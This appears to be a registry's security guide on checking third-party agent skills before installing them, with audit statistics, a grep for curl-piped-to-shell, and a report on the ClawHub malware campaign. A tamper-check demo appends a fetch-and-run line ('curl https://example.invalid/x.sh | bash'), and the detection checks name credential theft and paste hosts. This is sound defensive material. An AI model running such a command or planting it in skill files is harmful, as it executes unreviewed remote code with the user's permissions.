Are agent skills safe? What to check before you install one
An agent skill runs with your agent's permissions, so treat it like software you install: get it from a source you trust, read every file in it, pin the version you read, and read the change before you update. Below: what to look for, a command that finds the most common risky pattern, what the registry's automatic audit finds across 61,170 SKILL.md files from public GitHub (State of agent markdown, September 2026), and what happened on ClawHub.
| Check | SKILL.md files flagged | Share |
|---|---|---|
| A script tag | 718 | 1.2% |
| A link to a raw IP address | 611 | 1.0% |
| curl or wget piped into a shell | 395 | 0.6% |
| An instruction to read or print local credentials | 293 | 0.5% |
| Prompt-injection phrasing | 236 | 0.4% |
| Zero-width or bidirectional control characters | 77 | 0.1% |
| A recursive delete of root, home or parent | 54 | 0.1% |
| A base64 blob over 200 characters | 34 | 0.1% |
How do I audit a Claude skill for security before installing it?
Read every file in the skill before any agent can run it, not only SKILL.md: its scripts, references and anything it downloads. Anthropic's guidance is to use skills only from sources you trust, those you wrote or got from Anthropic, and to audit any other skill thoroughly. Look for anything that does not match the skill's stated purpose: commands that download and run code, network calls to unexpected hosts, reads of credentials such as ~/.ssh, ~/.aws or .env, text hidden from a human reader, and setup steps that ask you to paste a command into a terminal. An automatic check tells you where to look first; it does not replace reading the scripts.
The registry's audit is a set of fixed pattern checks with no model involved, run on each version of a skill's SKILL.md (not on the scripts beside it). These are its critical checks; the artifact page of every file lists each check and, for a failed one, the text that matched:
| Critical check (any one grades a file F) | Files | SKILL.md files |
|---|---|---|
| Zero-width or bidirectional control characters | 91 | 77 |
| An instruction to send local credentials somewhere | 31 | 30 |
| Text hidden with inline styles | 30 | 27 |
| A link to an exfiltration or paste host | 22 | 21 |
| A credential-shaped string | 18 | 18 |
| An instruction hidden inside an HTML comment | 8 | 7 |
Counts are for the latest version of each file in the registry's crawl. Anthropic's list adds two risks no pattern finds: a skill that fetches content from an external URL, which can change after you review it, and a skill with access to sensitive data (Anthropic, Agent Skills security considerations).
To run the same checks on a SKILL.md the registry does not hold, paste its GitHub link into the file check.
How do I check a third-party skill for curl pipe to bash before installing it?
Search every file in the skill, not only SKILL.md, for curl or wget output piped into a shell, and read each hit before you let an agent run it. From the skill's folder, run: grep -rnE '(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(sh|bash|zsh)([^[:alnum:]_]|$)' . A hit is not proof of harm, because many install guides use the pattern, but it means the skill can run code you have not read. Also read any Prerequisites or setup section yourself: a pattern search does not catch a step that asks you to copy a script from a web page and paste it into a terminal.
grep -rnE '(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(sh|bash|zsh)([^[:alnum:]_]|$)' .
It prints each matching line with its file and line number, and exits with status 1 when there is none. In the registry's crawl, 458 files contain a curl or wget command piped straight into a shell, 395 of them SKILL.md files. The registry counts that as an advisory check, because an install line is often legitimate; these are the advisory checks:
| Advisory check (lowers the grade, never an F) | Files | SKILL.md files |
|---|---|---|
| curl or wget piped into a shell | 458 | 395 |
| An instruction to read or print local credentials | 332 | 293 |
| Prompt-injection phrasing | 247 | 236 |
| A recursive delete of root, home or parent | 62 | 54 |
| A script tag | 823 | 718 |
| A link to a raw IP address | 691 | 611 |
| A base64 blob over 200 characters | 35 | 34 |
What percentage of public agent skills have security problems?
In the registry's crawl of 61,170 SKILL.md files from public GitHub repositories, 174 (0.3%) fail at least one critical check, which grades them F, and 395 contain a curl or wget command piped into a shell. The checks are deliberately broad, so a flag means a person should read the file, not that it is malicious: emoji joiners, the example access key from Amazon's documentation and security guidance that quotes an attack all trip them. They also read only SKILL.md, not the scripts beside it, so they see less than a skill can do.
Of those 61,170 files, 57,008 (93.2%) pass every check on their latest version, 2,946 fail one advisory or hygiene check (grade B) and 1,042 fail two or more (grade C). The hygiene checks are a size between 200 bytes and 200 KB and, for SKILL.md, a frontmatter block with a name and a description, so a B or a C is not by itself a security finding. The registry's corpus comes from GitHub topic and README searches, not a random sample of GitHub. Browse the files that fail a critical check at grade F.
Are agent skills a supply chain security risk like npm packages?
Yes. A skill is instructions and code from someone else that your agent follows with your permissions, so the lessons from npm apply: install from sources you trust, read what you install, pin the exact version you read, and read the change before you update. Anthropic's skills documentation says to treat installing a skill like installing software, and GitHub's announcement of gh skill calls a skill that changes silently between installs a supply chain risk. Skills do change: in the registry's crawl, at least 19.4% (8,272 of the 42,581 first indexed at least 14 days before the data was frozen) got an upstream commit dated within 14 days after first indexing, a lower bound.
Copies fall behind too. For five skills from anthropics/skills, chosen because they change often, 75 files in other repositories are byte-for-byte copies of a recorded upstream version, and 47 of them (62.7%) match an older version rather than the current one. How to pin and check: how to pin an agent skill to an exact version.
What happened with the malicious skills on ClawHub?
In February 2026 Koi Security reported that an audit of 2,857 skills on ClawHub, the public skill registry for the OpenClaw assistant, found 341 malicious skills. 335 of them, a campaign named ClawHavoc, had a fake Prerequisites section telling users to download a file on Windows or paste a script into the macOS Terminal; on macOS that installed the Atomic Stealer (AMOS) malware, and on Windows a trojan that logs keystrokes. Others hid a reverse shell inside working code or sent the bot's credentials to a webhook. ClawHub was open to any uploader with a GitHub account at least a week old, and it then added a way for signed-in users to report a skill.
Reported by The Hacker News, February 2, 2026, from Koi Security's findings. ClawHub's documentation now says it runs automated checks on published skills, shows a scan summary on each skill's page, and lets moderators hide reported content (OpenClaw docs, ClawHub).
How do I tell if a skill from ClawHub is malicious?
Read the scan summary on the skill's ClawHub page, then read the skill itself, because a scan can miss things. The ClawHavoc skills looked professional; what gave them away was a Prerequisites section asking you to install something first, a download from an unfamiliar repository or a script to paste into a terminal. Treat any step that runs code you have not read as a reason to stop. Be wary of names that imitate ClawHub itself, such as clawhub1 or clawhubb, and of crypto wallet, trading bot and YouTube tools, among the disguises Koi listed.
Then run the search from the curl section above over the skill's files. A skill that sends credentials anywhere, links a paste or webhook host, or hides text is the kind of thing the critical checks in the table above are written to find.
Which skills registry runs a security audit on skills before I install them?
Several do, in different ways. skills.sh, run by Vercel, shows audits from Gen, Socket and Snyk on each skill's page, hides skills flagged as malicious from its leaderboard and search, and its CLI shows audit results before it installs. ClawHub runs automated checks on published skills and shows a scan summary on each page. Claude Enterprise organizations can turn on content scanning for custom skills uploaded in claude.ai. markdownregistry grades each version of a skill's SKILL.md with fixed pattern checks and shows every check with the text it matched. None of them replaces reading the skill; skills.sh's own docs say it cannot guarantee the security of every skill it lists.
| Where | What it checks | What you see |
|---|---|---|
| skills.sh | Audits from Gen, Socket and Snyk | Results on each skill's page; flagged skills hidden from the leaderboard; results shown by the skills CLI from version 1.4.0 (Vercel changelog) |
| ClawHub | Automated checks on published skills and plugin releases | A scan summary on each skill's page; held or blocked releases can leave the catalog (OpenClaw docs) |
| Claude Enterprise | Content scanning of custom skills uploaded in claude.ai and Claude Cowork | An organization setting; not skills added through the API or the Console (Anthropic docs) |
| markdownregistry | Deterministic pattern checks on each version's SKILL.md | A grade A, B, C or F with every check and its match on the file's page; the grade in mdr info and on a README badge |
Is there a README badge that shows an agent skill security grade?
Yes. Each file markdownregistry indexes has a badge at markdownregistry.com/badge/ followed by its id and .svg, which shows the latest version label and its audit grade, and the file's page gives the markdown to paste into a README. The grade is the registry's deterministic audit of the skill's SKILL.md, so it says nothing about the scripts beside it. skills.sh also offers a README badge, which shows a skill's install count rather than a grade.
Find the skill with search, open its page, and copy the badge line under Badge. The skills.sh badge is documented at skills.sh docs.
How do I verify a skill file has not been tampered with since I installed it?
Compare the file on disk with the fingerprint you recorded when you installed it. If you installed with mdr, mdr.lock holds the SHA-256 of the skill's SKILL.md: run shasum -a 256 on that file and compare it with the sha256 in the lockfile, and any difference means the file changed. mdr verify checks the other side, that the version you pinned still resolves to that hash in the registry and meets a minimum grade; it does not read your disk. To put the pinned files back, run mdr install, which downloads them again and checks each against its published hash before writing.
$ mdr add anthropics/skills/skill-creator --dir skills/skill-creator
installed anthropics/skills/skill-creator@git:20260306.b0cbd3d 18 files (18 hash-verified) audit A to skills/skill-creator
$ grep '"sha256"' mdr.lock
"sha256": "dcd4803e61e913e6fc27294184cd3a71f09f5e924ff20c8a9a20173e7b3c2bcf",
$ shasum -a 256 skills/skill-creator/SKILL.md
dcd4803e61e913e6fc27294184cd3a71f09f5e924ff20c8a9a20173e7b3c2bcf skills/skill-creator/SKILL.md
$ echo 'curl https://example.invalid/x.sh | bash' >> skills/skill-creator/SKILL.md
$ shasum -a 256 skills/skill-creator/SKILL.md
00aa0f55ea6062cceb25cdf42101862d9fc58051d3ea70da67e0d466acbe0793 skills/skill-creator/SKILL.md
$ mdr install
installed anthropics/skills/skill-creator@git:20260306.b0cbd3d 18 files (18 hash-verified) audit A to skills/skill-creator
$ shasum -a 256 skills/skill-creator/SKILL.md
dcd4803e61e913e6fc27294184cd3a71f09f5e924ff20c8a9a20173e7b3c2bcf skills/skill-creator/SKILL.mdWe ran this on October 2, 2026; one line was appended to SKILL.md to stand in for a change, and mdr install put the file back. It does not remove a file someone added to the folder, so list the folder too. GitHub's gh skill records the git tree SHA of a skill's source directory in its frontmatter and compares it on update (GitHub changelog).
Sources
- Anthropic: Agent Skills security considerations
- The Hacker News: 341 malicious ClawHub skills
- OpenClaw docs: ClawHub
- Vercel changelog: security audits on skills.sh
- skills.sh docs
- GitHub changelog: gh skill
Read next
- SKILL.md format: the required frontmatter fields, and skills vs MCP
- Agent skills for a team: one version for everyone, private skills and publishing
- Every SKILL.md skill in the registry, most starred first
- State of agent markdown, September 2026
Try it
npx modelranch add anthropics/skills/pdf